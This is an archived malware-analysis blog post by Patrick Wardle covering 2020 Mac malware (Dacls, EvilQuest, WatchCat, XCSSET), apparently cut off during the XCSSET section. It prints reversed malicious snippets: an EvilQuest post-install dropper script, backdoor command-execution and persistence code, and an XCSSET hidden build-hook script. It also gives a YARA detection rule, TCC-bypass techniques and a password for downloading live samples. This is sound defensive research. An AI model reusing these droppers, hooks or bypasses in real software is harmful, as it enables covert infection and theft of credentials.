{
	"id": "fd3d55aa-1871-4d3e-859b-b2104b3de783",
	"created_at": "2026-04-06T00:13:14.084168Z",
	"updated_at": "2026-04-10T03:38:19.157844Z",
	"deleted_at": null,
	"sha1_hash": "bf512036c3e5a2143435037b5c30accba8a3ee56",
	"title": "The Mac Malware of 2020 👾",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11326705,
	"plain_text": "The Mac Malware of 2020 👾\r\nArchived: 2026-04-05 22:47:34 UTC\r\na comprehensive analysis of the year's new malware\r\nby: Patrick Wardle / January 1, 2021\r\n📝 👾 Want to play along?\r\nAll samples covered in this post are available in our malware collection.\r\n…just make sure not to infect yourself!!\r\nPrintable\r\nA printable (PDF) version of this report can be downloaded here:\r\nThe Mac Malware of 2020.pdf\r\n⌛ Background\r\nGoodbye, and good riddance 2020 …and hello 2021! 🥳\r\nIn recent years, malicious programs targeting macOS have grown in prevalence (and sophistication), perhaps even reaching parity with Microsoft Windows platforms. This is well illustrated in Malwarebytes’ “2020 State of Malware Report”:\r\n\"And for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint.\" -Malwarebytes\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 1 of 62\n\nThreats per endpoint, Macs vs. Windows (credit: Malwarebytes)\r\nIt is important to note these statistics include both adware (and potentially unwanted programs). And the reality is, if a Mac user is infected with malicious code, more than likely it will be adware (vs. a sophisticated nation-state backdoor):\r\n\"The vast majority of threats for macOS in [recent years] were in the AdWare category.\" -Kaspersky\r\nHowever, it is wise not to underestimate the potential impact of adware upon its victims. The noted security researcher Thomas Reed articulates this well in a writeup titled “Mac adware is more sophisticated and dangerous than traditional Mac malware”:\r\n\"However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. 
They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.\" -Thomas Reed\r\n…now, back to malware! For the fifth year in a row, I’ve decided to put together a blog post that aims to comprehensively cover all the new Mac malware that appeared during the course of the year. While the malware may have been reported on before (i.e. by the AV company that discovered them), this blog aims to cumulatively and comprehensively cover all the new Mac malware of 2020 in one place …yes, with samples of each malware for download, so that you can play along! #SharingIsCaring\r\nIn this blog post, we focus on new Mac malware specimens or new variants that appeared in 2020. Adware and/or malware from previous years are not covered.\r\nHowever, at the end of this blog, I’ve included a brief section dedicated to these other threats, that includes links to detailed write-ups.\r\nFor each malicious specimen covered in this post, we’ll identify the malware’s:\r\nInfection Vector:\r\nHow it was able to infect macOS systems.\r\nPersistence Mechanism:\r\nHow it installed itself, to ensure it would be automatically restarted on reboot/user login.\r\nFeatures \u0026 Goals:\r\nWhat was the purpose of the malware? a backdoor? a cryptocurrency miner? 
or something more insidious…\r\nAlso, for each malware specimen, I’ve added a direct download link in case you want to follow along with our analysis or dig into the malware more!\r\nMalware Analysis Tools \u0026 Tactics\r\nThroughout this blog, we’ll reference various tools used in analyzing the malware specimens.\r\nThese include:\r\nProcessMonitor\r\nOur user-mode (open-source) utility that monitors process creations and terminations, providing detailed information about such events.\r\nFileMonitor\r\nOur user-mode (open-source) utility that monitors file events (such as creation, modifications, and deletions), providing detailed information about such events.\r\nWhatsYourSign\r\nOur (open-source) utility that displays code-signing information, via the UI.\r\nNetiquette\r\nOur (open-source) network monitor.\r\nlldb\r\nThe de-facto commandline debugger for macOS. Installed (to /usr/bin/lldb ) as part of Xcode.\r\nHopper Disassembler\r\nA “reverse engineering tool (for macOS) that lets you disassemble, decompile and debug your applications” …or malware specimens!\r\nTimeline\r\nDacls\r\n05/2020\r\nA macOS port of a Lazarus group cross-platform backdoor.\r\nEvilQuest\r\n06/2020\r\nAn insidious virus, with ransomware capabilities.\r\nWatchCat\r\n07/2020\r\nThe latest Lazarus APT group backdoor.\r\nXCSSET\r\n08/2020\r\nTargeting developers, this malware leverages various 0days to steal passwords and exfiltrate data.\r\nFinSpy\r\n09/2020\r\nA commercial cross-platform implant, supporting a myriad of cyber espionage features \u0026 capabilities.\r\nIPStorm\r\n10/2019\r\nA cross-platform botnet, ...now ported to macOS.\r\nGravityRAT\r\n11/2019\r\nA cross-platform first-stage downloader for a RAT, ...now ported to macOS.\r\n👾 OSX.Dacls\r\nDacls is a macOS port of the cross-platform Dacls RAT (created by the Lazarus APT group), which affords a remote 
attacker complete control over an infected system.\r\nDownload: OSX.Dacls (password: infect3d )\r\nDacls was originally discovered in 2019, but at that time was only seen targeting Windows and Linux systems:\r\n\"Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.\" -Malwarebytes\r\n…in 2020, MalwareBytes uncovered a macOS variant.\r\nWriteups:\r\n“The Dacls RAT …now on macOS!”\r\n“New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app”\r\nInfection Vector: Trojanized (2FA) Application\r\nMalwareBytes, who uncovered the Mac variant of OSX.Dacls , note:\r\n\"[the] Mac version is ...distributed via a Trojanized two-factor authentication application for macOS called MinaOTP\"\r\nThe trojanized application was (re)named TinkaOTP , and distributed via the disk image TinkaOTP.dmg\r\n…it is likely that the attackers relied on social engineering efforts, having to coerce macOS users to download and run the trojanized application. 
This is the de-facto infection mechanism leveraged by the Lazarus group for many years (to target macOS users).\r\nFor example, back in 2018, after creating a fake crypto-currency site, they emailed users with links to download OSX.AppleJeus :\r\nOSX.AppleJeus infection vector\r\nThe application, TinkaOTP.app , is signed “adhoc-ly” (as the Lazarus group often does):\r\n$ codesign -dvvv /Volumes/TinkaOTP/TinkaOTP.app\r\nExecutable=/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP\r\nIdentifier=com.TinkaOTP\r\nFormat=app bundle with Mach-O thin (x86_64)\r\n...\r\nSignature=adhoc\r\nThis also means that on modern versions of macOS (unless some exploit is first used to gain code execution on the target system), the application will not (easily) run:\r\nmacOS blocking TinkaOTP.app\r\nLet’s now take a closer look at the application bundle of TinkaOTP.app :\r\nTinkaOTP Application Bundle\r\nIf the user runs the (trojanized) application, infection will commence. 
Specifically, the /Contents/MacOS/TinkaOTP binary will copy a file from within its application bundle ( Resources/Base.lproj/SubMenu.nib ) to ~/Library/.mina and then execute it.\r\nThis can be passively observed via our ProcessMonitor :\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"pid\" : 864\r\n \"path\" : \"/bin/cp\",\r\n \"arguments\" : [\r\n \"cp\",\r\n \"/Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib\",\r\n \"/Users/user/Library/.mina\"\r\n ]\r\n ...\r\n }\r\n}\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"pid\" : 866\r\n \"path\" : \"/Users/user/Library/.mina\",\r\n \"arguments\" : [\r\n \"/Users/user/Library/.mina\"\r\n ]\r\n ...\r\n }\r\n}\r\nPersistence: Launch Item\r\nOSX.Dacls persists as a launch item ( com.aex-loop.agent.plist ).\r\nIf running as root, it will persist as a launch daemon; otherwise, as a user launch agent.\r\nThe binary SubMenu.nib (which, recall, was copied to ~/Library/.mina ) contains both a template for, and the path to, the persistent launch item property list:\r\nOSX.Dacls' launch item template\r\nOSX.Dacls' launch item path\r\nVia our FileMonitor , one can passively observe the malware creating the launch item (here a user launch agent, ~/Library/LaunchAgents/com.aex-loop.agent.plist ):\r\n# FileMonitor/Contents/MacOS/FileMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_CREATE\",\r\n \"file\" : {\r\n \"destination\" : \"/Users/user/Library/LaunchAgents/com.aex-loop.agent.plist\",\r\n \"process\" : {\r\n \"path\" : \"/Users/user/Library/.mina\",\r\n \"pid\" : 931\r\n ...\r\n }\r\n }\r\n}\r\nAs the value for the RunAtLoad key in com.aex-loop.agent.plist is set to true, the malware will be automatically (re)started by macOS each time 
the system is rebooted (and the user logs in).\r\nCapabilities: Persistent Backdoor (+ plugins).\r\nWe noted that OSX.Dacls is a macOS port of a Windows/Linux RAT. The initial report on the (Windows/Linux versions of the) Dacls RAT was published in December 2019 by Netlab, titled “Dacls, the Dual platform RAT”.\r\nIn terms of the RAT's capabilities, the report noted it utilizes a modular plugin architecture:\r\n\"[Dacls] uses static compilation to compile the plug-in and Bot code together. By sending different instructions to call different plug-ins, various tasks can be completed.\r\nThe main functions of …Dacls Bot include: command execution, file management, process management, test network access, C2 connection agent, network scanning module.\" -Netlab\r\nThe report describes various plugins such as a:\r\nFile plugin\r\nProcess plugin\r\n“Test” plugin\r\n“Reverse P2P” plugin\r\n“LogSend” plugin\r\nAnalyzing the malware’s disassembly (specifically searching for LoadPlugin_* functions), we can see that the macOS variant of Dacls supports these same plugins (plus several others, such as a SOCKS plugin):\r\nOSX.Dacls' Plugins\r\nVia these plugins a remote attacker can interact with and fully control an infected system by:\r\nExecuting system commands\r\nProcess actions, such as listing, creating, \u0026 terminating\r\nFile actions such as upload/download, read/write, \u0026 deleting\r\n…and more (such as performing network scans).\r\n👾 OSX.EvilQuest\r\nEvilQuest (also known as ThiefQuest) is a (true) computer virus, that also provides remote tasking and ransomware logic.\r\nDownload: OSX.EvilQuest (password: infect3d )\r\nThe noted malware researcher Dinesh Devadoss discovered OSX.EvilQuest and tweeted about its ransomware tendencies and impersonation as a Google Software update:\r\nFurther analysis uncovered other 
insidious capabilities, including the ability to virally infect other binaries on an infected system!\r\nWriteups:\r\n“OSX.EvilQuest Uncovered (Part 1)”\r\n“OSX.EvilQuest Uncovered (Part 2)”\r\n“Updates on ThiefQuest, the Quickly-Evolving macOS Malware”\r\nInfection Vector: Pirated Software\r\nFrom Dinesh’s tweet, it was not apparent how the malware was able to infect macOS users. However, Thomas Reed of Malwarebytes noted that the malware had (also?) been found in pirated versions of popular macOS software, shared on popular torrent sites:\r\nPirated Application, Infected with OSX.EvilQuest (credit: Malwarebytes)\r\nEthical reasons aside, it's generally unwise to install pirated software, as it is often infected with malware.\r\n“Torrent sites are notorious for distributing malware and adware, sometimes through misleading advertisements, and sometimes through Trojan horse downloads that claim to be ‘cracks’ or that may contain infected copies of legitimate software” -Intego\r\nThe sample analyzed here was packaged in a pirated version of the popular DJ software Mixed In Key. The malicious package was unsigned …meaning macOS will prompt the user before allowing it to be opened:\r\nOSX.EvilQuest Infection Vector\r\nHowever, macOS users attempting to pirate software will likely ignore this warning, pressing onwards …ensuring infection commences.\r\nWe can use the Suspicious Package utility to statically examine the package contents. 
It contains an application named Mixed In Key 8 and a binary named “ patch ”:\r\nClicking on the “All Scripts” tab, we also find a post install script:\r\n#!/bin/sh\r\nmkdir /Library/mixednkey\r\n\r\nmv /Applications/Utils/patch /Library/mixednkey/toolroomd\r\nrmdir /Application/Utils\r\n\r\nchmod +x /Library/mixednkey/toolroomd\r\n\r\n/Library/mixednkey/toolroomd \u0026\r\nThis post install script (which is executed during the package installation) will first create a /Library/mixednkey directory. Then, it moves the patch binary into this directory (renaming it toolroomd ), sets it to be executable …and then launches it.\r\nAs the installer requests root privileges during the install, this script (and thus the toolroomd binary) will also run with root privileges:\r\nAs the \"Mixed In Key 8\" binary is (still) validly signed by the Mixed In Key developers, it is likely pristine and unmodified\r\n…the malicious components of the package are thus the post install script and the patch binary.\r\nPersistence: Launch Item\r\nDepending on its privilege level, OSX.EvilQuest persists either as a user launch agent, or a launch daemon (and a launch agent). The code responsible for this logic is found within a function named ei_persistence_main .\r\nAfter invoking various anti-analysis logic (e.g. a debugger check), the function then invokes a helper function, persist_executable , to install the malware. If the malware is running with non-root privileges it copies itself to ~/Library/AppQuest/com.apple.questd . However, if running as root, it will also copy itself to /Library/AppQuest/com.apple.questd .\r\nOnce the malware has copied itself, it persists via a launch item. The code that performs this persistence is found in the install_daemon function (invoked by ei_persistence_main ). 
If running as non-root, it persists as a launch agent: ~/Library/LaunchAgents/com.apple.questd.plist . If the malware is running with root privileges it will invoke the install_daemon function again, but this time specifying that a launch daemon should be created.\r\nAfter the malware has ensured it is persisted (twice, if running as root!), it invokes the ei_selfretain_main function to start the launch item(s). This function invokes the aptly named run_daemon which in turn invokes macOS’s osascript binary to launch the items via an AppleScript command:\r\nOSX.EvilQuest launch item persistence\r\nThe template for the property list for these launch item(s) is stored as an encrypted string within the malware.\r\nAs RunAtLoad is set to true in the malware’s launch item plist ( com.apple.questd.plist ), macOS will automatically restart the malware on subsequent reboots.\r\nCapabilities: File Exfiltration, Remote Tasking, Ransomware, Viral Infection ...and more!\r\nOne of the first actions taken by OSX.EvilQuest is to scan an infected system for various files that match a list of embedded regular expressions. From these regexes, we can ascertain that the malware has a propensity for certificates and crypto-currency keys \u0026 wallets:\r\nOSX.EvilQuest's file exfiltration\r\nAny file on the infected system that matches any of these regexes will be exfiltrated to the attacker (including, as shown above, a test file, key.png ).\r\nThe malware also supports remote tasking, including the following:\r\nTask 0x1 : react_exec\r\nThe react_exec command appears to execute a payload received from the server. Interestingly, it attempts to first execute the payload directly from memory! 
Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory , NSLinkModule , NSLookupSymbolInModule , and NSAddressOfSymbol APIs to load and link the in-memory payload.\r\nAt a previous BlackHat talk (“Writing Bad @$$ Malware for OS X”), I discussed this technique (and noted Apple used to host sample code to implement such in-memory execution):\r\nIf the in-memory execution fails, the malware writes out the payload to a file named .xookc , sets it to be executable (via chmod ), then executes it via a call to system .\r\nTask 0x2 : react_save\r\nThe react_save command decodes data received from the server and saves it to a file. It appears the file name is specified by the server as well. In some cases the file will be set to executable via a call to chmod .\r\nTask 0x4 : react_start\r\nThis method is a nop, and does nothing:\r\nint react_start(int arg0) {\r\n return 0x0;\r\n}\r\nTask 0x8 : react_keys\r\nThe react_keys command starts a keylogger. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine . This function creates an event tap (via the CGEventTapCreate API), adds it to the current runloop, then invokes CGEventTapEnable to activate the event tap.\r\nOnce the tap is activated, keypresses (e.g. by the user) will be delivered to the process_event function, which then converts the raw keypresses to “readable” key codes (via the kconvert function). Somewhat interestingly, the malware then passes the converted key code to the printf function …to print them out? (You’d have thunk it would write them to a file …). 
Perhaps this part of the code is not quite done (yet)!\r\nTask 0x10 : react_ping\r\nThe react_ping command simply compares a value from the server with the (now decrypted) string \"Hi there\" . A match causes this command to return “success”, which likely just causes the malware to respond to the server for (more) tasking.\r\nTask 0x20 : react_host\r\nThis method is a nop, and does nothing:\r\nint react_host(int arg0) {\r\n return 0x0;\r\n}\r\nTask 0x40 : react_scmd\r\nThe react_scmd command will execute a command from the server via the popen API:\r\n__text:0000000100009EDD mov rdi, [rbp+var_18] ; char *\r\n__text:0000000100009EE1 lea rsi, aR ; \"r\"\r\n__text:0000000100009EE8 mov [rbp+var_70], rax\r\n__text:0000000100009EEC call _popen\r\nThe response (output) of the command is read, and transmitted back to the server via the eicc_serialize_request and http_request functions.\r\nThe most readily observable side-effect of an OSX.EvilQuest infection is its file encryption (ransomware) activities.\r\nAfter the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user’s files, by invoking a function named carve_target .\r\nThe carve_target function first begins the key generation process via a call to the random API, and functions named eip_seeds and eip_key . It then generates a list of files to encrypt, by invoking the get_targets function, passing in is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. 
The encrypted list of extensions is hard-coded in the malware.\r\nArmed with a list of target files (that match the above extensions), the malware completes the key generation process (via a call to random_key , which in turn calls srandom and random ), before calling a function named carve_target on each file.\r\nThe carve_target function is invoked with the path of the file to encrypt, the result of the call to random_key , as well as values returned by the calls to eip_seeds and eip_key .\r\nIt takes the following actions:\r\n1. Makes sure the file is accessible via a call to stat\r\n2. Creates a temporary file name, via a call to a function named make_temp_name\r\n3. Opens the target file for reading\r\n4. Checks if the target file is already encrypted via a call to a function named is_carved (which checks for the presence of BEBABEDD at the end of the file).\r\n5. Opens the temporary file for writing\r\n6. Reads 0x4000 byte chunks from the target file\r\n7. Invokes a function named tpcrypt to encrypt the (0x4000) bytes\r\n8. Writes out the encrypted bytes to the temporary file\r\n9. Repeats steps 6-8 until all bytes have been read and encrypted from the target file\r\n10. Invokes a function named eip_encrypt to encrypt (certain?) keying information which is then appended to the temporary file\r\n11. Writes 0DDBEBABE to the end of the temporary file (as noted by Dinesh Devadoss)\r\n12. Deletes the target file\r\n13. 
Renames the temporary file to the target file\r\nOSX.EvilQuest's file ransom logic\r\nOnce all the files in the list of target files have been encrypted, the malware writes out the following to a file named READ_ME_NOW.txt :\r\nOSX.EvilQuest's ransom note\r\nTo make sure the user reads this file, it displays the following modal prompt, and reads it aloud via macOS's built-in say command:\r\nOSX.EvilQuest's ransom alert\r\nThe most unique feature of OSX.EvilQuest is its capability to (locally) virally propagate. In short, the malware generates a list of executables on the system, then invokes a method named append_ai to inject itself into the binary:\r\nOSX.EvilQuest's viral infection logic\r\nThe following image illustrates the details of the viral infection:\r\nOSX.EvilQuest's viral infection logic\r\nTo ensure the infected binary acts “normal” (i.e. runs its original code so that nothing appears amiss), the viral code writes the program's original bytes out to a new file named: .\u003coriginalfilename\u003e1. This file is then set executable (via chmod) and executed (via execl).\r\nBy injecting itself into the start of the (other) binaries on the system, the malware ensures that it is rather difficult to remove!\r\n👾 OSX.WatchCat\r\nWatchCat appears to be a Lazarus APT group creation, that builds off previous backdoors …while adding new capabilities.\r\nDownload: OSX.WatchCat (password: infect3d )\r\nAs noted by the macOS security researcher Scott Knight, information about OSX.WatchCat was made public via the addition of an XProtect signature (version 2127):\r\nXProtect 2127 adds two new rules to detect \"watchcat\". VT engines label it as NukeSpeed. 
Could be Lazarus related.\r\n3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93\r\n— Scott Knight (@sdotknight) July 24, 2020\r\nScanning the malicious binary via UXProtect shows a match on XProtect_MACOS_580a1bc :\r\n$ cd /Library/Apple/System/Library/CoreServices/\r\n$ cat XProtect.bundle/Contents/Resources/XProtect.yara\r\nrule XProtect_MACOS_580a1bc\r\n{\r\n meta:\r\n description = \"MACOS.580a1bc\"\r\n strings:\r\n $s1 = { 73 77 5F 76 65 72 73 20 2D 70 72 6F 64 75 63 74 4E 61 6D 65 }\r\n $s2 = { 73 77 5F 76 65 72 73 20 2D 70 72 6F 64 75 63 74 56 65 72 73 69 6F 6E }\r\n $s3 = { 73 77 5F 76 65 72 73 20 2D 62 75 69 6C 64 56 65 72 73 69 6F 6E }\r\n $s4 = { 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 4D 61 63 69 6E 74 6F 73 ... }\r\n $s5 = { 63 6F 6D 2E 61 70 70 6C 65 2E 77 61 74 63 68 63 61 74 2E 70 6C 69 73 74 }\r\n condition:\r\n Macho and filesize \u003c 500KB and all of them\r\n}\r\nWriteups:\r\n“Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform”\r\nInfection Vector: Unknown\r\nUnfortunately the XProtect signature and a binary sample are all the (public) information we have about OSX.WatchCat …meaning its infection vector remains unknown. 
However, the Lazarus APT group (the likely authors of this malware) are rather fond of packaging up their backdoors in trojanized applications:\r\n…thus, it’s possible that OSX.WatchCat is distributed in a similar manner.\r\nPersistence: Launch Daemon\r\nTaking a peek at the OSX.WatchCat binary, we find an embedded launch daemon property list:\r\nThis (embedded) plist is referenced from a function named InsertToLaunchDaemons :\r\nint _InsertToLaunchDaemons(int arg0, int arg1) {\r\n plist = malloc(strlen(arg0) + 0x400);\r\n sprintf_chk(plist, 0x0, 0xffffffffffffffff, \"\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\u003e\\n\u003c!DOCTYPE plist P\r\n\r\n sprintf_chk(path, 0x0, 0x104, \"/Library/LaunchDaemons/%s\", \"com.apple.watchcat.plist\");\r\n file = fopen(path, \"wb\");\r\n if (file != 0x0) {\r\n fwrite(plist, strlen(plist), 0x1, rbx);\r\n fclose(file);\r\n chmod(path, 444o);\r\n }\r\n ...\r\n}\r\nThe above code first formats the property list (i.e. adds the full path to the malware’s binary image), and builds a path to the launch daemon ( /Library/LaunchDaemons/com.apple.watchcat.plist ). It then writes out the (now configured) plist.\r\nAs the RunAtLoad key is set to true, the malware will be automatically (re)started each time the system is rebooted.\r\n…however, the first time (i.e. prior to reboot), the malware manually starts the launch daemon via the SinLaunchCTL function. 
This function simply invokes launchctl load on the launch daemon plist ( com.apple.watchcat.plist ):\r\nint SinLaunchCTL() {\r\n sprintf_chk(path, 0x0, 0x104, \"/Library/LaunchDaemons/%s\", \"com.apple.watchcat.plist\");\r\n sprintf_chk(command, 0x0, 0x200, \"launchctl load %s \u003e /dev/null 2\u003e\u00261 \u0026\", path);\r\n rax = popen(command, \"r\");\r\n ...\r\n}\r\nCapabilities: Backdoor, plus \"webshell\"\r\nMac malware analyst Phil Stokes notes in a recent writeup:\r\n\"...there are some overlaps with the earlier [Lazarus Group] backdoor samples ...there is also much more to this malware that has not been seen in the other samples, including use of a WebShell.\"\r\nBefore taking a look at the webshell, let’s discuss OSX.WatchCat ’s download and execute functionality.\r\nTo execute external commands and processes, the malware invokes the popen system API. By looking at cross-references (x-refs) to this API, we can find the code responsible for executing commands from the server:\r\nThe malware’s MsgCmd function invokes popen on a passed-in argument:\r\nint MsgCmd(int arg0) {\r\n buffer = malloc(SAR(0x1000000000 + (strlen(arg0) \u003c\u003c 0x20), 0x20));\r\n __sprintf_chk(buffer, 0x0, 0xffffffffffffffff, \"%s 2\u003e\u00261\", arg0);\r\n popen(buffer, \"r\");\r\n}\r\nWorking backwards, we see that the MsgCmd function is invoked from the CmdProc function. CmdProc first invokes the SendMsgOnlyType function (to send a message to a remote command \u0026 control server via the curl APIs). 
It then parses the response and acts upon it:\r\nAs (just) noted, MsgCmd will execute the specified command.\r\nOther commands appear to provide a remote attacker the ability to:\r\ndownload files\r\nupload files\r\nkill a process ( MsgPK )\r\ndelete a file ( MsgSdel )\r\n…and more!\r\nAs Phil noted, this is similar to the capabilities afforded by other Lazarus Group backdoors (such as OSX.Yort). He also noted, though, the addition of the “use of a WebShell.”\r\nThe “webshell” logic is found in the Auth_WebShell function (which is invoked in a loop by the malware’s Start function). It appears to be a simple check-in, with a value of 259D7B1TE1002A65 :\r\nint Auth_WebShell() {\r\n ...\r\n rax = rand();\r\n _g_nBoardID = rax + -((0xffffffffe90452d5 * rax \u003e\u003e 0x2d) * 0x2328) + 0x3e8;\r\n *(\u0026var_60 + 0x8) = '56A2001E';\r\n var_60 = 'T1B7D952';\r\n\r\n var_A4 = rand();\r\n rax = SendRawData(_g_HttpSetting, ..., \u0026var_60, \u0026var_A4, 0x4);\r\n if (rax != 0x0) {\r\n rbx = 0x0;\r\n rax = RecvRawData(\u0026var_80, 0x4);\r\n if (rax != 0x0) {\r\n __sprintf_chk(\u0026var_A0, 0x0, 0x20, \"%04d\", *(int32_t *)_g_nBoardID);\r\n rax = strcmp(\u0026var_A0, \u0026var_80);\r\n rbx = rax == 0x0 ? 0x1 : 0x0;\r\n }\r\n }\r\n ...\r\n return rax;\r\n}\r\n👾 OSX.XCSSET\r\nXCSSET is rather unique, as it targets macOS developers (Xcode users) and leverages several 0days to steal passwords and exfiltrate data.\r\nDownload: OSX.XCSSET (password: infect3d )\r\nIn July, I noticed that Apple’s XProtect update (v. 
2126) had added a new signature for a sample Cupertino named MACOS.2070d41 :\r\n…it wasn’t until August, when TrendMicro researchers released their report on (and IoCs for) OSX.XCSSET , that we learned more about this intriguing malware.\r\n\"We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware [OSX.XCSSET], which leads to a rabbit hole of malicious payloads.\" -TrendMicro\r\nWriteups:\r\n“Mac malware exposed: XCSSET, an advanced new threat”\r\n“What is OSX.XCSSET malware and what should I do about it?”\r\n“XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits”\r\nInfection Vector: (user-downloaded) Xcode Projects\r\nXcode is the de-facto IDE for developing software for Apple devices (iOS, macOS, etc.). It appears that OSX.XCSSET was originally discovered hiding within various developers’ Xcode projects. Several of these infected projects were found/hosted online (on Github).\r\nIf an XCSSET-infected Xcode project is downloaded and built, the malicious code will be automatically run and the developer’s Mac will be infected.\r\nTrendMicro explains:\r\n\"This threat primarily spreads via Xcode projects... It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. 
These Xcode projects have been modified such that upon building, these projects would run a malicious code.\r\nThis eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.\" -TrendMicro\r\nExamining an Xcode project infected with OSX.XCSSET reveals a script in the project’s project.pbxproj file that executes another script ( Assets.xcassets ) from a hidden directory ( .xcassets/ ):\r\nmalicious build script in an OSX.XCSSET-infected Xcode project\r\nTaking a peek at this Assets.xcassets script reveals it executes a binary named xcassets …which is the core component of the malware:\r\ncd \"${PROJECT_FILE_PATH}/xcuserdata/.xcassets/\"\r\nxattr -c \"xcassets\"\r\nchmod +x \"xcassets\"\r\n./xcassets \"${PROJECT_FILE_PATH}\" true%\r\nAs noted, building the infected project will trigger the execution of the script(s).\r\nPersistence: None(?)\r\nIt appears that OSX.XCSSET does not persist, but rather relies on the user triggering both the initial infection and (subsequent) re-executions of the malware …for example building an infected Xcode project, or running one of the applications it modifies.\r\nHowever, due to the primary goals of the malware (credential stealing and file exfiltration), there may be no need, nor advantage, to the malware persisting.\r\nIn terms of application modifications (which can lead to “persistence” via user interactions), OSX.XCSSET modifies (references to) Safari (not the actual Safari.app, which would invalidate the code signature).\r\nThe TrendMicro report notes:\r\n\"This is done so that when the infected user wants to open the normal Safari browser, the fake one will get executed instead.\r\n...functionally, this means that the fake Safari browser runs instead of the legitimate version of Safari.\" 
-TrendMicro

Examining an Xcode project infected with OSX.XCSSET reveals a script in the project’s project.pbxproj file that executes another script (Assets.xcassets) from a hidden directory (.xcassets/):

[Figure: malicious build script in an OSX.XCSSET-infected Xcode project]

Taking a peek at this Assets.xcassets script reveals it executes a binary named xcassets …which is the core component of the malware:

cd "${PROJECT_FILE_PATH}/xcuserdata/.xcassets/"
xattr -c "xcassets"
chmod +x "xcassets"
./xcassets "${PROJECT_FILE_PATH}" true

As noted, building the infected project will trigger the execution of the script(s).

Persistence: None(?)

It appears that OSX.XCSSET does not persist, but rather relies on the user triggering both the initial infection and (subsequent) re-executions of the malware …for example building an infected Xcode project, or running one of the applications it modifies.

However, due to the primary goals of the malware (credential stealing and file exfiltration), there may be no need, nor advantage, to the malware persisting.

In terms of application modifications (which can lead to “persistence” via user interactions), OSX.XCSSET modifies (references to) Safari (not the actual Safari.app, which would invalidate the code signature).

The TrendMicro report notes:

"This is done so that when the infected user wants to open the normal Safari browser, the fake one will get executed instead.
...functionally, this means that the fake Safari browser runs instead of the legitimate version of Safari." -TrendMicro

It should also be noted that several of the malware’s modules reference launch agent property lists …property lists that are likely related to the malware. For example (as noted by TrendMicro) the remove_old module “removes … ~/Library/LaunchAgents/com.apple.core.launchd.plist” while the cleaner module “removes ~/Library/LaunchAgents/com.apple.core.accountsd.plist” …thus some versions/variants of OSX.XCSSET may persist via normal mechanisms (e.g. launch agents).

Capabilities: Credential Stealing, Data Exfiltration, Ransomware, Viral Replication ...and more!

One of the main goals of OSX.XCSSET is to steal credentials and exfiltrate data from user applications.

A writeup by Intego notes:

"XCSSET attempts to steal passwords from victims’ Apple ID, Google, Paypal, and other accounts. ... [the malware] also attempts to exfiltrate data from apps such as Apple Notes, Evernote, Skype, Telegram, and WeChat" -Intego

It should be noted that on recent versions of macOS, malware is prevented from accessing various user/system files, unless the user has manually granted the application “Full Disk Access” (via the System Preferences application).

To work around this privacy mechanism, OSX.XCSSET leverages (what were) two 0day exploits:

The first vulnerability (implemented in the malware’s safari_cookie module) abuses the fact that Full Disk Access is granted to the ssh service. The malware simply (ab)uses scp to “connect” to the system it’s running on (username@localhost) and copy protected files (e.g. Safari’s binary cookie file).

The second vulnerability leverages SafariForWebKitDevelopment. As noted in a Jamf writeup on the malware:

"The second exploit leverages a developer specific tool. If the device doesn’t already have the SafariForWebKitDevelopment component installed, the malware goes and downloads it.
With this, it can utilize Safari’s extensive capabilities without being hindered by the usual sandbox." -Jamf

…in order to gain code execution within the context of Apple’s SafariForWebKitDevelopment binary, the malware (ab)uses the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables:

[Figure: OSX.XCSSET's dylib injection (credit: TrendMicro)]

Once loaded within the (developer version of) Safari, the malicious code (JavaScript) can be downloaded and executed without being constrained by normal browser restrictions. This allows it to manipulate browser results, as well as steal credentials from various sites of interest.

The combination of these two exploits is rather potent, and allows OSX.XCSSET to perform its credential stealing and data exfiltration actions quite effectively:

"XCSSET effectively has all the tools it needs to run arbitrary code and touch every file on the system, neatly sidestepping the strong defenses in macOS." -Jamf

And what if the user doesn’t have Safari? Well, as Intego notes:

“And just in case the victim doesn’t use Safari, XCSSET also has the capability of installing Trojanized versions of many other Mac browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, 360 (a Chinese browser), and Yandex (a Russian browser).”

Besides credential / data stealing, OSX.XCSSET supports a myriad of other capabilities (implemented via payload modules). The TrendMicro report summarizes the plugins (and their capabilities).
